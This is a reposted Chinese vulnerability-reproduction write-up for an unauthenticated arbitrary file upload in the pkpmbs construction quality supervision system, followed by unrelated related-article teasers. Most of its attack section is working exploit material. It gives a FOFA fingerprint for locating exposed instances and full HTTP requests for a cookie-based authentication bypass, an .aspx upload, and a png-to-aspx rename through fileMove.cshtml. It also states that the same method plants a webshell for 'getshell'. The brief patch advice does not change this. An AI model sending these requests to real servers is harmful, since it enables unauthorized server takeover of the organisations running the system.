pkpmbs 建设工程质量监督系统 文件上传漏洞复现

news2025/1/24 5:36:28

0x01 产品简介

  pkpmbs 建设工程质量监督系统是湖南建研信息技术股份有限公司一个与工程质量检测管理系统相结合的,B/S架构的检测信息监管系统。

0x02 漏洞概述

 pkpmbs 建设工程质量监督系统 FileUpOrDown.aspx、/Platform/System/FileUpload.ashx、接口处存在任意文件上传漏洞,未经身份认证的攻击者可以利用漏洞上传恶意后门文件,从而获取服务器权限。

0x03 影响范围

标准版 <= 2.2023.0328.172228

0x04 复现环境

FOFA:icon_hash="2001627082"

0x05 漏洞复现 

PoC-1

GET /Login.cshtml HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

获取有效cookie,绕过权限认证

携带cookie,上传文件 

POST /Applications/Forms/SearchSetting/FileUpOrDown.ashx?operation=Fileupload&extName=.aspx&&searchConfigName=上传的文件名 HTTP/1.1
Host: your-ip
Cookie: your-cookie
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqACRhAMBHmQQAUP
Content-Length: 185

------WebKitFormBoundarybqACRhAMBHmQQAUP
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: image/png

test
------WebKitFormBoundarybqACRhAMBHmQQAUP--

回显了上传路径,验证

Getshell

 

PoC-2 

POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqACRhAMBHmQQAUP
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

------WebKitFormBoundarybqACRhAMBHmQQAUP
Content-Disposition: form-data; name="file"; filename="1.aspx"
Content-Type: image/png

test
------WebKitFormBoundarybqACRhAMBHmQQAUP
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------WebKitFormBoundarybqACRhAMBHmQQAUP--

PS:直接是不允许上传aspx文件,需要先上传txt、png等类型文件然后,转换文件格式 

上传png文件

转换文件类型

GET /Applications/SkillDevelopAndEHS/fileMove.cshtml?filePath=上传的文件名&factFilePath=1.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

 根据上面回显的路径验证

上传马子也是同样的姿势

0x06 修复建议

官方已修复该漏洞,请用户联系厂商升级至安全版本:http://www.hunanjianyan.com/

通过防火墙等安全设备设置访问策略,设置白名单访问。

如非必要,禁止公网访问该系统。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1268261.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

编程实现bf算法

编程实现bf算法

BF算法&#xff08;Brute Force算法&#xff09;是一种朴素的字符串匹配算法&#xff0c;其基本思想是在文本串中不断地比较模式串和文本串中的子串&#xff0c;直到找到匹配的位置或者搜索完整个文本串。 下面是用Python实现BF算法的代码&#xff1a; def bf_search(text, p…
阅读更多...
vuepress-----8、自定义域名

vuepress-----8、自定义域名

# 8、自定义域名 购买域名 [外链图片转存中…(img-0XcE3Zjv-1701236952478)] 填写域名、https # 自定义域名
阅读更多...
【机器学习 | 可视化系列】可视化系列 之 决策树可视化

【机器学习 | 可视化系列】可视化系列 之 决策树可视化

&#x1f935;‍♂️ 个人主页: AI_magician &#x1f4e1;主页地址&#xff1a; 作者简介&#xff1a;CSDN内容合伙人&#xff0c;全栈领域优质创作者。 &#x1f468;‍&#x1f4bb;景愿&#xff1a;旨在于能和更多的热爱计算机的伙伴一起成长&#xff01;&#xff01;&…
阅读更多...
基于SSM的航空票务推荐系统的设计与实现

基于SSM的航空票务推荐系统的设计与实现

末尾获取源码 开发语言&#xff1a;Java Java开发工具&#xff1a;JDK1.8 后端框架&#xff1a;SSM 前端&#xff1a;Vue 数据库&#xff1a;MySQL5.7和Navicat管理工具结合 服务器&#xff1a;Tomcat8.5 开发软件&#xff1a;IDEA / Eclipse 是否Maven项目&#xff1a;是 目录…
阅读更多...
光伏、储能双层优化配置接入配电网研究(附带Matlab代码)

光伏、储能双层优化配置接入配电网研究(附带Matlab代码)

由于能源的日益匮乏&#xff0c;电力需求的不断增长等&#xff0c;配电网中分布式能源渗透率不断提高&#xff0c;且逐渐向主动配电网方向发展。此外&#xff0c;需求响应(demand response&#xff0c;DR)的加入对配电网的规划运行也带来了新的因素。因此&#xff0c;如何综合考…
阅读更多...
UE 事件分发机制(二) day10

UE 事件分发机制(二) day10

自定义事件分发机制 自建事件分发机制与结构 Unreal推荐的游戏逻辑开发流程 基于 Unreal推荐的游戏逻辑开发流程&#xff0c;一般我们的整体规划也就是这样 大致结构类图 创建接口类与管理类以及所需函数 新建一个Unreal接口类作为接口 然后创建一个蓝图函数库的基类 Ev…
阅读更多...
适合大部分人可以做的兼职副业

适合大部分人可以做的兼职副业

大部分人每天八点上班&#xff0c;五点下班&#xff0c;日复一日地重复着枯燥的工作内容&#xff0c;关键是工资还不够花。那么&#xff0c;怎么才能增加日常收入、提高生活质量呢&#xff1f;副业兼职是个不错的赚钱选择。打工人除去日常工作&#xff0c;额外的空闲时间还是很…
阅读更多...
宏基因组分析项目又双叒叕出新了!期盼已久的铁循环来了!!

宏基因组分析项目又双叒叕出新了!期盼已久的铁循环来了!!

铁是地球上几乎所有生命的微量营养素。它可以被铁氧化和铁还原微生物用作电子供体和电子受体&#xff0c;并用于多种生物过程&#xff0c;包括光合作用和呼吸作用。虽然铁是地壳中含量第四丰富的金属&#xff0c;但在有毒环境中&#xff0c;铁的生长往往受到限制&#xff0c;因…
阅读更多...
惠威M200MKII音箱拆机

惠威M200MKII音箱拆机

惠威M200MKII音箱是一对老音箱了&#xff0c;买了大概快有十多年了吧&#xff0c;几年前就已经有音量旋钮旋转的时候有噪音问题&#xff0c;一直用使用前快速左右旋一段时间&#xff0c;让电位器内部摩擦一下&#xff0c;就会好不少&#xff0c;但过些天又不行了。因为不是蓝牙…
阅读更多...
基于springboot和vue的教务学生选课管理系统的设计与实现 (含源码+sql+视频导入教程)

基于springboot和vue的教务学生选课管理系统的设计与实现 (含源码+sql+视频导入教程)

&#x1f449;文末查看项目功能视频演示获取源码sql脚本视频导入教程视频 1 、功能描述 基于Springboot和vue的教务&#xff08;学生&#xff09;管理系统拥有三种角色&#xff1a;管理员、教师和学生 管理员&#xff1a;班级管理、课程管理、创建课程、管理员管理、教师管理…
阅读更多...
SDN、SD-WAN、CDN、SDH分别是什么,有什么关联?

SDN、SD-WAN、CDN、SDH分别是什么,有什么关联?

SDN代表“软件定义网络”&#xff0c;是一种网络架构&#xff0c;它将网络控制和数据转发分离。SDWAN代表“软件定义广域网”&#xff0c;是SDN的一种实现&#xff0c;在广域网中使用虚拟化技术来连接分支机构和数据中心。 CDN代表“内容分发网络”&#xff0c;是一种通过在全球…
阅读更多...
Python内置函数与标准库函数的详细解读

Python内置函数与标准库函数的详细解读

一、内置函数与标准库函数的区分 Python 解释器自带的函数叫做内置函数&#xff0c;这些函数可以直接使用&#xff0c;不需要导入某个模块。 Python 解释器也是一个程序&#xff0c;它给用户提供了一些常用功能&#xff0c;并给它们起了独一无二的名字&#xff0c;这些常用功能…
阅读更多...
算法通关村第一关—青铜挑战—用Java基本实现各种链表操作

算法通关村第一关—青铜挑战—用Java基本实现各种链表操作

文章目录 第一关—链表【青铜挑战】1.1 单链表的概念1.2 链表的相关概念1.3 创建链表 - Java实现1.4 链表的增删改查1.4.1 遍历单链表 - 求单链表长度1.4.2 链表插入 - 三种位置插入&#xff08;1&#xff09;在链表的表头插入&#xff08;2&#xff09;在链表的中间插入&#…
阅读更多...
sqlserver调试clr程序集

sqlserver调试clr程序集

右键项目属性&#xff0c;选择调试&#xff0c;勾选sqlserver调试选项&#xff1a; 选择附加到进程调试&#xff0c;勾选显示所有用户的进程&#xff0c;选择sqlserver.exe进程&#xff0c;打好程序集的断点&#xff0c;基于sqlserver触发clr程序集&#xff0c;即可中止到相关断…
阅读更多...
个人开发者是否能借助开源获利?

个人开发者是否能借助开源获利?

前言 近几年国内外开源软件的成倍增长&#xff0c;以及开源软件在互联网领域的比重越来越高&#xff0c;开源软件扮演者越来越重要的角色&#xff0c;所以开源软件不仅推动了技术领域的不断创新和发展&#xff0c;也给个人开发者们提供了越来越多的合作机会和获利的机会。同时&…
阅读更多...
二叉树(判断是否为单值二叉树)

二叉树(判断是否为单值二叉树)

题目&#xff08;力扣&#xff09;&#xff1a; 判断二叉树上每个节点的值是否相同&#xff0c;就需要让root节点分别与左节点和右节点分别比较是否相同。 注意&#xff1a;root等于空时&#xff0c;直接可以返回true&#xff1b; 首先&#xff0c;先判断他的特殊情况&#x…
阅读更多...
序列号管理

序列号管理

序列号管理&#xff0c;将从以下方面进行学习和阐述 WHY 为什么需要序列号&#xff0c;有什么作用 HOW sap如何进行管理序列号 WHEN 什么情况下适合进行序列号管理 1、 什么是序列号 首先简单介绍一个序列号是什么东西&#xff0c;我们使用的手机、电脑或者大家…
阅读更多...
HarmonyOS4.0开发应用(一)【工具安装】

HarmonyOS4.0开发应用(一)【工具安装】

工具安装 地址:https://developer.harmonyos.com/cn/develop/deveco-studio#download 我是windows&#xff0c;所以安装的windows 解压后双击该文件进行安装 安装完成后可选择是否导入开发工具的设置 这里选择不导入进入到工具内 点击Next进行安装 都没问题最终就可以开…
阅读更多...
操作系统原理-作业一-进程同步

操作系统原理-作业一-进程同步

1.某理发店可同时供 10 人理发&#xff0c;当店中顾客少于 10 人时&#xff0c;则店外的顾客可立即进入&#xff0c;否则需在外面等待。请定义所需信号量并写出信号量各种取值( 大于 0 、等于 0 、小于0)分别代表的含义&#xff0c;并用 P 、 V 操作编程实现完成多个顾…
阅读更多...
最高可挽回 20% 损失!东京大学利用 AI 及无人机,预测农作物最佳采收日期

最高可挽回 20% 损失!东京大学利用 AI 及无人机,预测农作物最佳采收日期

内容一览&#xff1a;如果能在短期内确定并预测田间所有作物的生长状况&#xff0c;就可以设定最佳采收日期&#xff0c;减少非标准尺寸作物的数量&#xff0c;并最大限度地减少收入损失。对此&#xff0c;来自东京大学和千叶大学的研究人员&#xff0c;给出了 AI 无人机解决方…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023